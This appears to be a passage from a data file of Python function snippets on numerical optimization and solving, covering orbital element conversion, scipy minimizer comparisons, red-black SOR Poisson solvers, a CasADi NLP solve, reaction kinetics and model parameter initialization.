Default to 0.\n omega = 0.\n if numNones == 1:\n if pomega is not None: # Only have to find omega is pomega was passed\n if np.cos(inc) > 0: # inc is in range [-pi/2, pi/2] (prograde), so pomega = Omega + omega\n omega = pomega - Omega\n else:\n omega = Omega - pomega # for retrograde orbits, pomega = Omega - omega\n\n longitudes = [f,M,l,theta,Tp] # can specify longitude through any of these four\n numNones = longitudes.count(None)\n\n if numNones < 4:\n raise ValueError(\"You can only pass one longitude/anomaly in the set [f, M, l, theta, Tp]\")\n if numNones == 5: # none of them passed. Default to 0.\n f = 0.\n if numNones == 4: # Only one was passed.\n if f is None: # Only have to work if f wasn't passed.\n if theta is not None: # theta is next easiest\n if np.cos(inc) > 0: # for prograde orbits, theta = Omega + omega + f\n f = theta - Omega - omega\n else:\n f = Omega - omega - theta # for retrograde, theta = Omega - omega - f\n else: # Either M, l, or T was passed. Will need to find M first (if not passed) to find f\n if l is not None:\n if np.cos(inc) > 0: # for prograde orbits, l = Omega + omega + M\n M = l - Omega - omega\n else:\n M = Omega - omega - l # for retrograde, l = Omega - omega - M\n else:\n if Tp is not None:\n M = 0.0 # assumed\n # f = clibrebound.reb_tools_M_to_f(c_double(e), c_double(M))", "def prob1():\n # Set up the initial guess, jacobian, and hessian.\n x0 = np.array([4.0,-2.5])\n jacobian = opt.rosen_der\n hessian = opt.rosen_hess\n\n # Test each method.\n info = {}\n info[\"Nelder-Mead\"] = opt.minimize(opt.rosen, x0, method='Nelder-Mead',\n options={'xtol':1e-8})\n info[\"Powell\"] = opt.minimize(opt.rosen, x0, method='Powell',\n options={'xtol':1e-8})\n info[\"CG\"] = opt.minimize(opt.rosen, x0, method='CG')\n info[\"BFGS\"] = opt.minimize(opt.rosen, x0, method='BFGS')\n info[\"Newton-CG w/out Hessian\"] = opt.minimize(opt.rosen, x0, jac=jacobian,\n method='Newton-CG', options={'xtol':1e-8})\n info[\"Newton-CG, w/ Hessian\"] = opt.minimize(opt.rosen, x0, jac=jacobian,\n hess=hessian, method='Newton-CG',options={'xtol':1e-8})\n info[\"L-BFGS-B\"] = opt.minimize(opt.rosen, x0, method='L-BFGS-B',\n options={'xtol':1e-8})\n info[\"TNC\"] = opt.minimize(opt.rosen, x0, method='TNC', \n options={'xtol':1e-8})\n info[\"COBYLA\"] = opt.minimize(opt.rosen, x0, method='COBYLA')\n info[\"SLSQP\"] = opt.minimize(opt.rosen, x0, method='SLSQP')\n\n # Report the info.\n print(\"\\n\\t\\tOptimization Tests\")\n for method in info:\n print(\"Method: {}\\n{}\\n\\n\".format(method, info[method]))\n \n # Answer the problem questions.\n print(\"The Powell algorithm takes the least number of iterations (19).\")\n print(\"COBYLA fails to find the correct minimum.\")", "def reconstruct_solution(spikes,sol,uval,twin,ics,tau,variable,**kwargs):\n\n # Model parameters\n pars = {'dt' : 1e-3}\n pars = gu.varargin(pars,**kwargs)\n\n # Generate time vector\n time = np.arange(twin[0],twin[-1],pars['dt'])\n time = np.sort(np.r_[time,spikes])\n # Generate spike vector\n tspk = np.copy(time)\n for i in range(1,len(spikes)):\n tspk[np.where(np.logical_and(time>=spikes[i-1],time<spikes[i]))[0]] = spikes[i-1]\n tspk[np.where(time >= spikes[len(spikes)-1])[0]] = spikes[len(spikes)-1]\n tspk[np.where(time < spikes[0])[0]] = 0\n # Generate general solution vector\n vsol = np.ones(time.size)\n if (variable=='x') and isscalar(uval):\n uval = uval * np.ones(sol.size)\n if variable=='x':\n for i in range(1, len(spikes)):\n # x must be given at x(t_i^+) according to xsol\n 
vsol[np.where(np.logical_and(time >= spikes[i - 1], time < spikes[i]))[0]] = sol[i-1]*(1-uval[i-1])\n vsol[np.where(time >= spikes[len(spikes) - 1])[0]] = sol[len(spikes) - 1]*(1-uval[len(spikes)-1])\n else:\n for i in range(1, len(spikes)):\n vsol[np.where(np.logical_and(time >= spikes[i - 1], time < spikes[i]))[0]] = sol[i-1]\n vsol[np.where(time >= spikes[len(spikes) - 1])[0]] = sol[len(spikes) - 1]\n vsol[np.where(time < spikes[0])[0]] = ics\n # Compute effective solution\n solution = np.zeros((2, time.size))\n solution[0] = time\n\n if variable=='x':\n # Assumes that the first ICs is x(0)\n solution[1] = xsol(vsol,time-tspk,tau)\n else:\n solution[1] = usol(vsol,time-tspk,tau)\n\n return solution", "def solve(self, p_0, u_0=None, k_ff_all_0=None, k_fb_safe=None, u_perf_0=None,\n k_fb_perf_0=None, sol_verbose=False, q_0=None, k_fb_0=None):\n assert self.solver_initialized, \"Need to initialize the solver first!\"\n\n u_0_init, k_ff_all_0_init, k_fb_safe_init, u_perf_0_init, k_fb_perf_0_init = self._get_init_controls()\n\n if u_0 is None:\n u_0 = u_0_init\n if k_ff_all_0 is None:\n k_ff_all_0 = k_ff_all_0_init\n if k_fb_safe is None:\n k_fb_safe = k_fb_safe_init\n if u_perf_0 is None:\n u_perf_0 = u_perf_0_init\n if k_fb_perf_0 is None:\n k_fb_perf_0 = k_fb_perf_0_init\n if q_0 is not None:\n if k_fb_0 is None:\n k_fb_0 = self.get_lqr_feedback()\n\n if self.opt_x0:\n params = np.vstack(\n (cas_reshape(k_fb_safe, (-1, 1)), cas_reshape(k_fb_perf_0, (-1, 1))))\n\n opt_vars_init = vertcat(cas_reshape(p_0, (-1, 1)), cas_reshape(u_0, (-1, 1)), u_perf_0, \\\n cas_reshape(k_ff_all_0, (-1, 1)))\n else:\n params = np.vstack(\n (p_0, cas_reshape(k_fb_safe, (-1, 1)), cas_reshape(k_fb_perf_0, (-1, 1))))\n\n opt_vars_init = vertcat(cas_reshape(u_0, (-1, 1)), u_perf_0, \\\n cas_reshape(k_ff_all_0, (-1, 1)))\n\n if self.init_uncertainty:\n params = vertcat(params, cas_reshape(q_0, (-1, 1)), cas_reshape(k_fb_0, (-1, 1)))\n\n crash = False \n sol = self.solver(x0=opt_vars_init, lbg=self.lbg, ubg=self.ubg, p=params)\n try:\n # pass\n sol = self.solver(x0=opt_vars_init, lbg=self.lbg, ubg=self.ubg, p=params)\n except:\n crash = True\n warnings.warn(\"NLP solver crashed, solution infeasible\")\n sol = None\n\n return self._get_solution(p_0, sol, k_fb_safe, k_fb_perf_0, sol_verbose, crash, q_0=q_0, k_fb_0=k_fb_0)", "def solve(self):\n ...", "def isobaric_rates(variables, time):\n TiCl4, O2, T = variables\n \n k1 = A1*np.exp(-Ea/(R*T)) * 1e-3\n\n k2 = A2*np.exp(-Ea/(R*T)) * 1e-3\n \n delHr = (T-726.85)*(12/125) - 102\n \n if O2 - (k1+k2*np.sqrt(O2))*TiCl4*end_time/steps <= 0 or np.isclose(0,O2) :\n return (0, 0, 0)\n \n else:\n rate_TiCl4 = -(k1+k2*np.sqrt(O2))*TiCl4\n rate_O2 = -(k1+k2*np.sqrt(O2))*TiCl4\n \n if initial_conditions[1] < initial_conditions[0]:\n X = -rate_O2/initial_conditions[1]\n else:\n X = -rate_TiCl4/initial_conditions[0]\n \n \n Cp_TiCl4 = A_TiCl4 + B_TiCl4*(T/1000) + C_TiCl4*((T/1000)**2) + D_TiCl4*((T/1000)**3) + E_TiCl4/((T/1000)**2)\n \n Cp_O2 = A_O2 + B_O2*(T/1000) + C_O2*((T/1000)**2) + D_O2*((T/1000)**3) + E_O2/((T/1000)**2)\n \n Cp_TiO2 = A_TiO2 + B_TiO2*(T/1000) + C_TiO2*((T/1000)**2) + D_TiO2*((T/1000)**3) + E_TiO2/((T/1000)**2)\n \n Cp_Cl2 = A_Cl2 + B_Cl2*(T/1000) + C_Cl2*((T/1000)**2) + D_Cl2*((T/1000)**3) + E_Cl2/((T/1000)**2)\n \n \n rate_T = -delHr * np.min(initial_conditions) * X / (Cp_TiCl4 + (O20/TiCl40)*Cp_O2 - Cp_TiO2 - 2*Cp_Cl2)\n \n #print(X, rate_T)\n \n return (rate_TiCl4, rate_O2, rate_T)", "def _reset_parameters(self) -> None:\n self._setup_input = {\n \"P\": 
csc_matrix(2.0 * self.opt.P(self.p).toarray()),\n \"q\": self.opt.q(self.p).toarray().flatten(),\n }\n if self.opt_type in CONSTRAINED_OPT:\n A = self.opt.A(self.p)\n b = self.opt.b(self.p)\n self._setup_input[\"A\"] = csc_matrix(\n cs.vertcat(self.opt.M(self.p), A, -A).toarray()\n )\n self._setup_input[\"l\"] = (\n cs.vertcat(-self.opt.c(self.p), -b, b).toarray().flatten()\n )", "def potentialSolver3(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n 
dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def potentialSolver3(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n 
dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def _sor_solver(self, A, b, initial_guess):\n phi = initial_guess[:]\n residual = np.inf\n iter_count = 0\n while residual > self.sor_epsilon:\n iter_count += 1\n old_phi = phi.copy()\n for i in range(A.shape[0]):\n sigma = 0\n for j in range(A.shape[1]):\n if j != i:\n sigma += A[i][j] * phi[j]\n phi[i] = (1 - self.omega) * phi[i] + (self.omega / A[i][i]) * (b[i] - sigma)\n # phi[i] = phi[i] + (self.omega / A[i][i]) * (b[i] - sigma)\n if phi[i] < 0:\n phi[i] = 0\n elif phi[i] > self.C:\n phi[i] = self.C\n residual = np.linalg.norm(phi - old_phi)\n print('Residual: {0:10.6g}'.format(residual))\n print(\"\\n~~~~~~ Iters count: {} ~~~~~~\\n\".format(iter_count))\n return phi", "def potentialSolver4(self, w, max_it, tol):\n\n dx2 = 1.0/(self.dh[0]*self.dh[0]); # dx^2\n dy2 = 1.0/(self.dh[1]*self.dh[1]); # dy^2\n dz2 = 1.0/(self.dh[2]*self.dh[2]); # dz^2\n \n L2 = 0.0 # norm\n \n converged = False\n \n # Step 1: create *integer* array the same size as u \n x = np.zeros_like(self.phi,dtype=np.int)\n\n # Step 2: populate all non-boundary cells with running numbers from 1 to (n-2)^2\n x[1:-1,1:-1,1:-1] = np.arange(1,(self.ni-2)*(self.nj-2)*(self.nk-2)+1).reshape(self.ni-2,self.nj-2,self.nk-2)\n\n # Step 3: get indices of even (red) and odd (black) points\n ir, jr, kr = np.where((x>0) & (x%2 == 0)) # indices of red pts = indices of even numbers\n ib, jb, kb = np.where((x>0) & (x%2 == 1)) # indices of black pts = indices of odd numbers\n\n\n \n # solve potential\n for it in np.arange(1,max_it+1):\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\" \n \"\"\"\n #standard internal open node\n phi_new = (self.rho[i][j][k]/self.EPS_0 +\\\n dx2*(self.phi[i-1][j][k] + self.phi[i+1][j][k]) +\\\n dy2*(self.phi[i][j-1][k] + self.phi[i][j+1][k]) +\\\n dz2*(self.phi[i][j][k-1] + self.phi[i][j][k+1]))/(2*dx2+2*dy2+2*dz2)\n \n # sucessive over relaxation \n self.phi[i,j,k] = self.phi[i,j,k] + 1.4*(phi_new - self.phi[i][j][k])\n \n \"\"\" \n \n \"\"\"\n #standard internal open node\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n (self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1])+\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1])+\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk]))/(2*dx2+2*dy2+2*dz2)\n \n \"\"\"\n \"\"\"\n # sucessive over relaxation \n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] = self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1] +\\\n 1.8*(self.phi_new[1:self.ni-1,1:self.nj-1,1:self.nk-1] - \\\n self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1])\n \"\"\"\n \n # Red point update\n self.phi[ir,jr,kr] = (1-w)*self.phi[ir,jr,kr] + (1.0/6.0)*w*(self.phi[ir+1,jr,kr] + self.phi[ir-1,jr,kr] +\\\n self.phi[ir,jr+1,kr] + self.phi[ir,jr-1,kr] +\\\n 
self.phi[ir,jr,kr+1] + self.phi[ir,jr,kr-1] +\\\n (self.rho[ir,jr,kr]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n # Black point update\n self.phi[ib,jb,kb] = (1-w)*self.phi[ib,jb,kb] + (1.0/6.0)*w*(self.phi[ib+1,jb,kb] + self.phi[ib-1,jb,kb] +\\\n self.phi[ib,jb+1,kb] + self.phi[ib,jb-1,kb] +\\\n self.phi[ib,jb,kb+1] + self.phi[ib,jb,kb-1] +\\\n (self.rho[ib,jb,kb]/self.EPS_0)*(self.dh[0]*self.dh[1]))\n\n #check for convergence*/\n if it%25==0:\n sum = 0;\n \"\"\"\n for i in np.arange(1,self.ni-1):\n for j in np.arange(1,self.nj-1):\n for k in np.arange(1,self.nk-1):\n \"\"\"\n\n self.R[1:self.ni-1,1:self.nj-1,1:self.nk-1] = \\\n -self.phi[1:self.ni-1,1:self.nj-1,1:self.nk-1]*(2*dx2+2*dy2+2*dz2) +\\\n self.rho[1:self.ni-1,1:self.nj-1,1:self.nk-1]/self.EPS_0 +\\\n dx2*(self.phi[0:self.ni-2,1:self.nj-1,1:self.nk-1] + self.phi[2:self.ni,1:self.nj-1,1:self.nk-1]) +\\\n dy2*(self.phi[1:self.ni-1,0:self.nj-2,1:self.nk-1] + self.phi[1:self.ni-1,2:self.nj,1:self.nk-1]) +\\\n dz2*(self.phi[1:self.ni-1,1:self.nj-1,0:self.nk-2] + self.phi[1:self.ni-1,1:self.nj-1,2:self.nk])\n\n sum = np.sum(self.R**2)\n\n L2 = np.sqrt(sum/(self.ni*self.nj*self.nk));\n #print(\"iter: \"+str(it)+\", L2 = \"+str(L2))\n if (L2<tol):\n converged = True\n break\n\n if (converged==False):\n print(\"Gauss-Seidel failed to converge, L2 = \"+str(L2))\n \n return converged", "def buildObjective(self):\r\n\r\n # self.z_prior might be the modified version\r\n self.L_elbo = T.mean(self.reconst + self.conditional_prior + self.w_prior + self.z_prior)\r\n\r\n self.L_elbo_modif = T.mean(self.reconst + self.conditional_prior + self.w_prior_modif + self.z_prior_modif)\r\n\r\n #---Getting model parameter---#\r\n cg = ComputationGraph(self.L_elbo)\r\n #self.phi_theta is the list of all the parameters in q and p.\r\n self.params = VariableFilter(roles=[PARAMETER])(cg.variables)", "def get_problem():\n\n #User Defined Terrain Elevation\n #def terr( x_pos, y_pos ):\n #Defines terrain elevation [m] as a function of x and y positions [m]\n # elev=100.0*(np.sin(0.5*(x_pos/1000.0)))**2.0 #User defined elevation map\n # return elev\n\n #User Defined Tunnel Cost\n #def tunnel(depth):\n #Defines additional cost for placing a 1 meter length of track a non-zero\n #depth below the ground.\n # TunnelCost=(50e3)/(1+np.exp(-(depth-5))) #Tunneling Cost (2016 USD)\n # return TunnelCost\n\n #def bridge(height):\n #Defines additional cost for placing a 1 meter length of track a non-zero\n #heigh above the ground.\n # BridgeCost=10e3*(height/10)**2 #Bridge Cost (2016 USD)\n # return BridgeCost\n\n # Rename this and/or move to optim package?\n problem = beluga.optim.Problem('surftest_noinc')\n\n #Define independent variables\n problem.independent('t', 's')\n\n # Define equations of motion\n problem.state('x','V*cos(hdg)','m') \\\n .state('y','V*sin(hdg)','m') \\\n .state('V','amax*sin(thrA) + eps*(cos(thrA)+cos(hdgA))','m/s') \\\n .state('hdg','cmax/V*sin(hdgA)','rad')\n\n # Define controls\n #problem.control('thrA','rad') \\\n # .control('hdgA','rad')\n problem.control('hdgA','rad')\n\n # Define Cost Functional\n problem.cost['path'] = Expression('1','s')\n\n #problem.cost['path'] = Expression('TimeToUSD+trk*V', 'USD')\n\n #+ \\\n #'(50e3)/(1.0+exp(-1.0*(z-0.0*(sin(0.5*(x/1000.0)))**2.0-5.0)))+'+ \\\n #'10e3*((0.0*(sin(0.5*(x/1000.0)))**2.0-z)/10.0)**2.0','USD')\n\n #Define constraints\n problem.constraints().initial('x-x_0','m') \\\n .initial('y-y_0','m') \\\n .initial('V-V_0','m/s') \\\n .initial('hdg-hdg_0','rad') \\\n .terminal('x-x_f','m') \\\n 
.terminal('y-y_f','m')\n #.terminal('V-V_f','m/s')\n #.initial('hdg-hdg_0','rad') \\\n\n #Define constants\n problem.constant('g',9.81,'m/s^2') #Acceleration due to gravity\n problem.constant('trk',1,'USD/m') #Basic cost of 1 m of track on ground (10k per m)\n problem.constant('amax',1.0,'m/s^2') #Maximum thrust acceleration of vehicle\n problem.constant('cmax',1.0,'m/s^2') #Maximum allowed centripetal acceleration\n problem.constant('eps',10,'m/s^2') #Error constant\n problem.constant('TimeToUSD',1,'USD/s') #Time is Money!!\n problem.constant('thrA',0,'rad')\n\n #Unit scaling\n problem.scale.unit('m','x') \\\n .unit('s','x/V') \\\n .unit('rad',1) \\\n .unit('USD',1)\n\n #Configure solver\n problem.bvp_solver = algorithms.MultipleShooting(derivative_method='fd',tolerance=1e-4, max_iterations=1000, verbose = True, cached = False, number_arcs=2)\n\n #Initial Guess\n problem.guess.setup('auto',start=[0.0,0.0,1.0,pi/4-0.2], costate_guess=-0.1) #City A\n\n #Add Continuation Steps\n problem.steps.add_step().num_cases(10) \\\n .terminal('x', 10) \\\n .terminal('y', 0)\n\n problem.steps.add_step().num_cases(10) \\\n .const('eps', 0.2)\n\n #problem.steps.add_step().num_cases(10) \\\n # .terminal('y', 2*pi*1000) \\\n # .terminal('z', 0.0) \\\n # .terminal('inc', 0.0)\n #^ City B\n return problem", "def anisotropy_solution(self, r, **kwargs):\n raise ValueError('routine not supported yet for constant anisotropy model!')", "def propose_optimize():\n pass", "def _reset_parameters(self):\n\n nn.init.xavier_normal_(self._W_x2i)\n nn.init.xavier_normal_(self._W_x2f)\n nn.init.xavier_normal_(self._W_x2o)\n nn.init.xavier_normal_(self._W_x2c)\n \n nn.init.orthogonal_(self._W_h2i)\n nn.init.orthogonal_(self._W_h2f)\n nn.init.orthogonal_(self._W_h2o)\n nn.init.orthogonal_(self._W_h2c)\n \n nn.init.uniform_(self._W_c2i)\n nn.init.uniform_(self._W_c2f)\n nn.init.uniform_(self._W_c2o)\n \n nn.init.constant_(self._b_i, 0)\n nn.init.constant_(self._b_f, 1)\n nn.init.constant_(self._b_o, 0)\n nn.init.constant_(self._b_c, 0)\n\n if self._chrono_init:\n print(self._t_max)\n b_f = torch.from_numpy(np.log(np.random.randint(1, self._t_max+1, size=self._hidden_size)))\n self._b_f.data.copy_(b_f)\n self._b_i.data.copy_(-b_f)", "def getOptimalParams(self):\n\t\t# Load calibration chain and find optimal for like1\n\t\tcal_data = pd.read_csv(self.database_path, sep=',')\n\t\tparams = cal_data.ix[cal_data['like1'].idxmax()].to_dict()\n\t\tcost = params['like1']\n\t\t# reformat parameters to match original naming\n\t\tparams_reformatted = {}\n\t\tfor k, p in self.cal_params.items():\n\t\t\tparams_reformatted[k] = params['par'+k]\n\n\t\treturn params_reformatted, cost", "def optimize_self(self):\n self.compute_predicate_values();\n \"\"\" Firstly,adjust the f(x) into > alpha_0; \"\"\"\n for i in range(len(self.RING_PARA_PAIR_CD)):\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CD[i]);\n self.RING_PARA_PAIR_CD[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CD[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CD[i][2] = self.RING_PARA_PAIR_CD[i][0].polynomial_func(self.RING_PARA_PAIR_CD[i][1]); # 更新内部ALPHA;\n for i in range(len(self.RING_PARA_PAIR_CC)):\n # ************** BUG 0627 **********************\n # if self.RING_PARA_PAIR_CC[i][2]<41 and self.RING_PARA_PAIR_CC[i][2]>40: # ---------------------------------------------------------------->>>>>\n # print( RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID] ); # ---------------------------------------------------------------->>>>>\n 
